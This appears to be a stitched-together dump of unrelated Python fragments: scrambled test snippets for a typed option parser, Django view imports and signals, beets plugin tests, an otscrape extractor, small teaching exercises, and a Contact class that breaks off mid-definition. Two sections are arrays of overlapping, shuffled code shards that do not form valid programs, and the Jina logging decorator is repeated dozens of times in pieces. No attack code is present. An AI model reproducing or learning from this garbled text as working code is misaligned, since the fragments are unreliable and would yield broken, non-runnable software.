"o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value, [1, 2, 3, 4]):",
"int) assert isinstance(want, int) assert got == want o = Option('o', list) o.setval('[1,2,3,4]')",
"== want o = Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for k,",
"assert _is_iterable(dict) assert _is_iterable(set) assert _is_iterable(List) assert _is_iterable(Dict) assert _is_iterable(Sequence) assert _is_iterable(Mapping) class",
"o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for got, want in zip(o.value,",
"number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is the number two}']) def testIsIterable(): assert _is_iterable(str) assert",
"assert isinstance(o.value, list) for got, want in zip(o.value, [1, 2, 3, 4]): assert",
"not _is_iterable(A) assert _is_iterable([1, 2, 3]) def testFromTypingModule(): assert _from_typing_module(List) assert _from_typing_module(Sequence) assert",
"float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is the number",
"pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is the number two}'])",
"want o = Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in",
"0) opt = Option('type', AType) opt.setval('hello') assert isinstance(opt.value, AType) assert opt.value.val == 'hello'",
"for k, v in o.value.items(): assert isinstance(k, str) assert isinstance(v, int) opt =",
"3]) def testFromTypingModule(): assert _from_typing_module(List) assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int, str]) assert not _from_typing_module(list)",
"in o.value.items(): assert isinstance(k, str) assert isinstance(v, int) opt = Option('num', complex) opt.setval('5+9j')"
] |
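The tests above pin down two helpers: _from_typing_module, which distinguishes typing constructs from builtins, and _is_iterable, which decides whether an annotation denotes a container. A minimal standalone sketch of what such helpers might look like; this is an illustration under those assumptions, not dispatch's actual implementation:

from typing import Dict, List, Mapping, Sequence

def _from_typing_module(t) -> bool:
    # typing constructs (List, Mapping, Dict[int, str], ...) report
    # __module__ == 'typing'; builtins like list report 'builtins'.
    return getattr(t, '__module__', None) == 'typing'

def _is_iterable(t) -> bool:
    if isinstance(t, type):
        # Builtin container types count; plain classes like int do not.
        return issubclass(t, (str, list, dict, set, tuple))
    if _from_typing_module(t):
        # typing generics such as List or Mapping count as iterable here.
        return True
    # Fall back to checking the object itself (e.g. an actual list).
    return hasattr(t, '__iter__')

assert _from_typing_module(List) and _from_typing_module(Dict[int, str])
assert not _from_typing_module(list) and not _from_typing_module(int)
assert _is_iterable(str) and _is_iterable(Sequence) and _is_iterable([1, 2, 3])
assert not _is_iterable(int)

dispatch's real checks may differ in detail; the point is only the behaviour the test assertions demand.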
# auto-reply view re-exports
from .add import AutoReplyAddView, AutoReplyAddExecodeView
from .validate import ContentValidationView
from .tag import AutoReplyTagPopularityQueryView
# beets copyartifacts plugin: filename handling tests
import os
import sys

from helper import CopyArtifactsTestCase

from beets import config


class CopyArtifactsFilename(CopyArtifactsTestCase):
    """
    Tests to check handling of artifacts with filenames containing unicode
    characters
    """
    def setUp(self):
        super(CopyArtifactsFilename, self).setUp()

        self._set_import_dir()
        self.album_path = os.path.join(self.import_dir, 'the_album')
        os.makedirs(self.album_path)

        self._setup_import_session(autotag=False)

        config['copyartifacts']['extensions'] = '.file'

    def test_import_dir_with_unicode_character_in_artifact_name_copy(self):
        open(os.path.join(self.album_path, u'\xe4rtifact.file'), 'a').close()
        medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3')
        self.import_media = [medium]

        self._run_importer()

        self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\xe4rtifact.file')

    def test_import_dir_with_unicode_character_in_artifact_name_move(self):
        config['import']['move'] = True

        open(os.path.join(self.album_path, u'\xe4rtifact.file'), 'a').close()
        medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3')
        self.import_media = [medium]

        self._run_importer()

        self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\xe4rtifact.file')

    def test_import_dir_with_illegal_character_in_album_name(self):
        config['paths']['ext:file'] = unicode('$albumpath/$artist - $album')

        # Create import directory, illegal filename character used in the album name
        open(os.path.join(self.album_path, u'artifact.file'), 'a').close()
        medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3', 'Tag Album?')
        self.import_media = [medium]

        self._run_importer()

        self.assert_in_lib_dir('Tag Artist', 'Tag Album_', u'Tag Artist - Tag Album_.file')
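The last test depends on path sanitisation: the '?' in 'Tag Album?' must come out as '_' both in the album directory and in the rendered '$albumpath/$artist - $album' template, after which the plugin appends the artifact's '.file' extension. A dependency-free sketch of that behaviour; the illegal-character set and helper names here are assumptions, not beets' actual code:

import re
from string import Template

ILLEGAL = r'[\\:*?"<>|]'  # assumed set of characters rejected in a path component

def sanitize(component):
    # Replace characters that are illegal in a filename with '_'.
    return re.sub(ILLEGAL, '_', component)

def render_path(template, **fields):
    # Sanitise each field, then substitute it into the path template.
    return Template(template).substitute({k: sanitize(v) for k, v in fields.items()})

album = sanitize('Tag Album?')  # -> 'Tag Album_'
print(render_path('$albumpath/$artist - $album',
                  albumpath='Tag Artist/' + album,
                  artist='Tag Artist',
                  album='Tag Album?'))
# Tag Artist/Tag Album_/Tag Artist - Tag Album_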
[
">>> my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>>",
"typing import List from jina import DocumentArray from jina.logging.logger import JinaLogger from jina.enums",
"verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level",
"= function(self, docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time for request",
"@add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs): >>> ... :param logger: The logger",
"**kwargs) if not docs: logger.debug('Docs is None. Nothing to monitor') return function(self, docs,",
"parameters dictionary: {parameters}') if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields",
"parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time for request {end_time - start_time}",
"for field in non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def",
"logs for `JINA_LOG_LEVEL` > info. You can set this as an env variable",
"is None or verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if not",
"def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level",
"docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else",
"time.time() result = function(self, docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time",
"non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time() result = function(self,",
"LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level is None or verbose_level > LogVerbosity.DEBUG:",
"... :param logger: The logger you want to use \"\"\" def decorator(function): @functools.wraps(function)",
"logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time() result = function(self, docs, parameters, **kwargs)",
"Only shows logs for `JINA_LOG_LEVEL` > info. You can set this as an",
"os import time from typing import List from jina import DocumentArray from jina.logging.logger",
"can set this as an env variable before starting your `Jina` application. Example",
"functools import os import time from typing import List from jina import DocumentArray",
"a request function. Only shows logs for `JINA_LOG_LEVEL` > info. You can set",
"logger: The logger you want to use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self,",
"from jina.logging.logger import JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]:",
"Example usages: >>> from jina import Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>>",
"end_time = time.time() logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.') return",
"you want to use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs):",
"jina.logging.logger import JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields",
"from typing import List from jina import DocumentArray from jina.logging.logger import JinaLogger from",
"The logger you want to use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs,",
"dictionary: {parameters}') if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}')",
"this as an env variable before starting your `Jina` application. Example usages: >>>",
"logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs)",
"{len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs) > 0: non_empty_fields =",
"doc in docs[:1]: for field in non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field)",
"non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality to a request function. Only shows",
"as an env variable before starting your `Jina` application. Example usages: >>> from",
"LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]:",
"import Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests",
"= time.time() logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.') return result",
"env variable before starting your `Jina` application. Example usages: >>> from jina import",
"result = function(self, docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time for",
"JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields)",
"len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time()",
"parameters, **kwargs) if not docs: logger.debug('Docs is None. Nothing to monitor') return function(self,",
"import time from typing import List from jina import DocumentArray from jina.logging.logger import",
"to a request function. Only shows logs for `JINA_LOG_LEVEL` > info. You can",
"def index(self, docs, parameters, **kwargs): >>> ... :param logger: The logger you want",
"@functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level)",
"= LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level is None or verbose_level >",
"starting your `Jina` application. Example usages: >>> from jina import Executor, requests >>>",
"non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add",
"list(docs[0].non_empty_fields) for doc in docs[:1]: for field in non_empty_fields: if field not in",
"non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality to a request function.",
"`JINA_LOG_LEVEL` > info. You can set this as an env variable before starting",
"_get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]: for field",
"function. Only shows logs for `JINA_LOG_LEVEL` > info. You can set this as",
"return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕 Received",
"docs: logger.debug('Docs is None. Nothing to monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄",
"my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def",
"= JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def index(self,",
"DocumentArray from jina.logging.logger import JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) ->",
"return function(self, docs, parameters, **kwargs) if not docs: logger.debug('Docs is None. Nothing to",
"Non-empty fields {non_empty_fields}') start_time = time.time() result = function(self, docs, parameters, **kwargs) end_time",
">>> ... :param logger: The logger you want to use \"\"\" def decorator(function):",
"docs, parameters, **kwargs) if not docs: logger.debug('Docs is None. Nothing to monitor') return",
"function(self, docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time for request {end_time",
"None if verbose_level is None or verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters,",
"List from jina import DocumentArray from jina.logging.logger import JinaLogger from jina.enums import LogVerbosity",
"to monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.')",
"-> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]: for field in non_empty_fields:",
"start_time = time.time() result = function(self, docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱",
">>> >>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def index(self, docs, parameters,",
"containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs) > 0: non_empty_fields",
"> info. You can set this as an env variable before starting your",
"def wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if",
"os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level is None",
"parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None",
"logger.debug('Docs is None. Nothing to monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received",
"verbose_level is None or verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if",
"wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level",
"fields {non_empty_fields}') start_time = time.time() result = function(self, docs, parameters, **kwargs) end_time =",
"else None if verbose_level is None or verbose_level > LogVerbosity.DEBUG: return function(self, docs,",
"LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if not docs: logger.debug('Docs is None. Nothing",
"Elapsed time for request {end_time - start_time} seconds.') return result return wrapper return",
"application. Example usages: >>> from jina import Executor, requests >>> my_logger = JinaLogger('MyExecLogger')",
"docs, parameters, **kwargs): >>> ... :param logger: The logger you want to use",
"non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]: for field in non_empty_fields: if field",
"in non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\"",
"verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if not docs: logger.debug('Docs is",
"List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]: for field in non_empty_fields: if",
":param logger: The logger you want to use \"\"\" def decorator(function): @functools.wraps(function) def",
"verbose_level else None if verbose_level is None or verbose_level > LogVerbosity.DEBUG: return function(self,",
"\"\"\" Add logging functionality to a request function. Only shows logs for `JINA_LOG_LEVEL`",
"Nothing to monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)}",
"not docs: logger.debug('Docs is None. Nothing to monitor') return function(self, docs, parameters, **kwargs)",
"> 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time() result",
"docs, parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary:",
"None or verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if not docs:",
"function(self, docs, parameters, **kwargs) if not docs: logger.debug('Docs is None. Nothing to monitor')",
"an env variable before starting your `Jina` application. Example usages: >>> from jina",
"**kwargs): >>> ... :param logger: The logger you want to use \"\"\" def",
"field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality",
"your `Jina` application. Example usages: >>> from jina import Executor, requests >>> my_logger",
"for doc in docs[:1]: for field in non_empty_fields: if field not in doc.non_empty_fields:",
"for `JINA_LOG_LEVEL` > info. You can set this as an env variable before",
"monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕",
"function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters",
"from jina import Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor):",
"if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time =",
"if verbose_level else None if verbose_level is None or verbose_level > LogVerbosity.DEBUG: return",
"usages: >>> from jina import Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>>",
"if verbose_level is None or verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs)",
"class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs): >>>",
"logging functionality to a request function. Only shows logs for `JINA_LOG_LEVEL` > info.",
"to use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level =",
"{parameters}') if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time",
"jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc",
"`Jina` application. Example usages: >>> from jina import Executor, requests >>> my_logger =",
"0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time() result =",
"> LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if not docs: logger.debug('Docs is None.",
"import DocumentArray from jina.logging.logger import JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray)",
"import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in",
"verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level is None or verbose_level",
"info. You can set this as an env variable before starting your `Jina`",
"variable before starting your `Jina` application. Example usages: >>> from jina import Executor,",
"time from typing import List from jina import DocumentArray from jina.logging.logger import JinaLogger",
"request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs) > 0:",
"import os import time from typing import List from jina import DocumentArray from",
"logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷",
">>> @requests >>> @add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs): >>> ... :param",
"import JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields =",
"not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality to",
"want to use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level",
"set this as an env variable before starting your `Jina` application. Example usages:",
"def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]: for",
"Received request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs) >",
"if field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add logging",
"logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.') return result return wrapper",
"requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger)",
"or verbose_level > LogVerbosity.DEBUG: return function(self, docs, parameters, **kwargs) if not docs: logger.debug('Docs",
"use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL',",
"in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality to a",
"DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for doc in docs[:1]: for field in",
"None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level is None or",
"parameters, **kwargs): >>> ... :param logger: The logger you want to use \"\"\"",
"in docs[:1]: for field in non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field) return",
"import functools import os import time from typing import List from jina import",
"**kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if",
"functionality to a request function. Only shows logs for `JINA_LOG_LEVEL` > info. You",
"You can set this as an env variable before starting your `Jina` application.",
"= list(docs[0].non_empty_fields) for doc in docs[:1]: for field in non_empty_fields: if field not",
"= time.time() result = function(self, docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed",
"None. Nothing to monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request containing",
"add_request_logger(logger): \"\"\" Add logging functionality to a request function. Only shows logs for",
"import List from jina import DocumentArray from jina.logging.logger import JinaLogger from jina.enums import",
"from jina import DocumentArray from jina.logging.logger import JinaLogger from jina.enums import LogVerbosity def",
"Received parameters dictionary: {parameters}') if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty",
"@requests >>> @add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs): >>> ... :param logger:",
"doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality to a request",
"request function. Only shows logs for `JINA_LOG_LEVEL` > info. You can set this",
"decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level =",
"docs, parameters, **kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time for request {end_time -",
"time.time() logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.') return result return",
">>> def index(self, docs, parameters, **kwargs): >>> ... :param logger: The logger you",
"from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]: non_empty_fields = list(docs[0].non_empty_fields) for",
">>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs):",
"JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def index(self, docs,",
"jina import DocumentArray from jina.logging.logger import JinaLogger from jina.enums import LogVerbosity def _get_non_empty_fields_doc_array(docs:",
"Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>> @requests >>>",
"index(self, docs, parameters, **kwargs): >>> ... :param logger: The logger you want to",
"logger you want to use \"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters,",
"**kwargs) end_time = time.time() logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.')",
"jina import Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>> class MyExec(Executor): >>>",
"{non_empty_fields}') start_time = time.time() result = function(self, docs, parameters, **kwargs) end_time = time.time()",
"MyExec(Executor): >>> @requests >>> @add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs): >>> ...",
">>> @add_request_logger(my_logger) >>> def index(self, docs, parameters, **kwargs): >>> ... :param logger: The",
"= _get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time() result = function(self, docs,",
"= os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None if verbose_level is",
"is None. Nothing to monitor') return function(self, docs, parameters, **kwargs) logger.debug(f'📄 Received request",
"_get_non_empty_fields_doc_array(docs) logger.debug(f'🏷 Non-empty fields {non_empty_fields}') start_time = time.time() result = function(self, docs, parameters,",
"if not docs: logger.debug('Docs is None. Nothing to monitor') return function(self, docs, parameters,",
"time for request {end_time - start_time} seconds.') return result return wrapper return decorator",
"Add logging functionality to a request function. Only shows logs for `JINA_LOG_LEVEL` >",
"def add_request_logger(logger): \"\"\" Add logging functionality to a request function. Only shows logs",
"field in non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields def add_request_logger(logger):",
"shows logs for `JINA_LOG_LEVEL` > info. You can set this as an env",
"docs[:1]: for field in non_empty_fields: if field not in doc.non_empty_fields: non_empty_fields.pop(field) return non_empty_fields",
">>> from jina import Executor, requests >>> my_logger = JinaLogger('MyExecLogger') >>> >>> class",
"\"\"\" def decorator(function): @functools.wraps(function) def wrapper(self, docs, parameters, **kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None)",
"before starting your `Jina` application. Example usages: >>> from jina import Executor, requests",
"**kwargs): verbose_level = os.environ.get('JINA_LOG_LEVEL', None) verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None if",
"documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}') if len(docs) > 0: non_empty_fields = _get_non_empty_fields_doc_array(docs)",
"parameters, **kwargs) logger.debug(f'📄 Received request containing {len(docs)} documents.') logger.debug(f'📕 Received parameters dictionary: {parameters}')",
"return non_empty_fields def add_request_logger(logger): \"\"\" Add logging functionality to a request function. Only"
] |
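The two fixes flagged in `_get_non_empty_fields_doc_array` are easy to see in isolation. The snippet below is a dependency-free sketch (plain lists stand in for Document fields; the names and values are illustrative) showing why removal must happen against a snapshot of the list being iterated.

fields_a = ['id', 'text', 'embedding']   # fields of the first document (illustrative)
fields_b = ['id', 'embedding']           # fields of a later document

common = list(fields_a)
for field in list(common):      # iterate a snapshot; mutating a list while
    if field not in fields_b:   # iterating it would silently skip elements
        common.remove(field)    # remove-by-value; list.pop() expects an index
print(common)                   # ['id', 'embedding']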
# otscrape: file extractors (FileContent / FileName)
from otscrape.core.base.extractor import Extractor
from otscrape.core.loader.file import LineObject


class FileContent(Extractor):
    def __init__(self, target=None, *, project=True, replace_error=None, **kwargs):
        super().__init__(target=target, project=project, replace_error=replace_error)
        self.kwargs = kwargs

    def extract(self, page, cache):
        target = self.target
        x = page[target]
        assert isinstance(x, LineObject)
        return x.content


class FileName(Extractor):
    def __init__(self, target=None, *, project=True, replace_error=None, **kwargs):
        super().__init__(target=target, project=project, replace_error=replace_error)
        self.kwargs = kwargs

    def extract(self, page, cache):
        target = self.target
        x = page[target]
        assert isinstance(x, LineObject)
        return x.filename
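Since both extractors only index the page and project a single attribute, their behaviour can be illustrated without otscrape installed. Everything below is a stand-in sketch: `FakeLineObject` and the dict-as-page are assumptions for illustration, not the otscrape API.

class FakeLineObject:
    """Minimal stand-in for otscrape.core.loader.file.LineObject."""
    def __init__(self, content, filename):
        self.content = content
        self.filename = filename

page = {'line': FakeLineObject('first line of data', 'input.txt')}

# What FileContent.extract / FileName.extract would project for target='line':
x = page['line']
print(x.content)    # 'first line of data'
print(x.filename)   # 'input.txt'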
# PROJECT : kungfucms
# TIME : 2020/6/9 12:54
# AUTHOR : <NAME>
# EMAIL : <EMAIL>
# PHONE : 13811754531
# WECHAT : 13811754531
# https://github.com/youngershen
from django.core.signals import request_started, request_finished
from django.dispatch import Signal, receiver

before_sign_in = Signal(providing_args=["toppings", "size"])
after_sign_in = Signal(providing_args=["toppings", "size"])
sign_in_post_permission = Signal(providing_args=["toppings", "size"])


@receiver(request_started)
def before_request(sender, **kwargs):
    pass


@receiver(request_finished)
def after_request(sender, **kwargs):
    pass
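These signals still use `providing_args`, which Django deprecated in 3.0 and removed in 4.0; on modern Django they would be declared as plain `Signal()`. A minimal sketch of wiring a handler to one of them follows; the handler name and the sender string are illustrative, not part of the original module.

from django.dispatch import Signal, receiver

before_sign_in = Signal()  # providing_args dropped, as required on Django >= 4.0

@receiver(before_sign_in)
def log_sign_in_attempt(sender, toppings=None, size=None, **kwargs):
    # Receivers must accept **kwargs; extra payload arrives as keyword args.
    print(f'sign-in attempt from {sender!r}: toppings={toppings}, size={size}')

# e.g. somewhere in a view:
before_sign_in.send(sender='auth-view', toppings=['mushrooms'], size='large')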
# Exercise solution: index of the last occurrence of the maximum value
def last_indexof_max(numbers):
    # write the modified algorithm here
    index = 0
    for i in range(len(numbers)):
        # '>=' (rather than '>') keeps updating on ties,
        # so the last occurrence of the maximum wins
        if numbers[i] >= numbers[index]:
            index = i
    return index
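A quick check of the tie-breaking behaviour, contrasted with the usual first-occurrence idiom; the sample list is illustrative.

values = [3, 9, 1, 9, 2]
print(last_indexof_max(values))    # 3: the index of the LAST maximum
print(values.index(max(values)))   # 1: the builtin idiom finds the FIRST one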
# aula2/exercicio2.py
"""
02 - What is the change due?
Define a variable for the value of a purchase that cost R$100.98;
Define a variable for the amount the customer paid, R$150.00;
Define a variable that computes the change, and print it to the console
with the final value rounded.
"""
valor_compra = 100.98   # purchase total
valor_pago = 150.00     # amount paid
troco = valor_pago - valor_compra
print(f'O seu troco é: R$ {troco:.2f}')  # "Your change is: R$ 49.02"
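One caveat worth noting: binary floats cannot represent 100.98 exactly, so the `:.2f` format hides a tiny representation error rather than removing it. For money, `decimal.Decimal` is the safer tool; a short sketch follows (not part of the original exercise).

from decimal import Decimal

valor_compra = Decimal('100.98')
valor_pago = Decimal('150.00')
troco = valor_pago - valor_compra   # exact decimal arithmetic
print(f'O seu troco é: R$ {troco}')  # R$ 49.02, exactly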
# dmi-vor/python_training: Contact model
from sys import maxsize


class Contact:
    def __init__(self, firstname=None, middlename=None, lastname=None, id=None, nickname=None,
                 title=None, company=None, address=None, homephone=None, mobilephone=None,
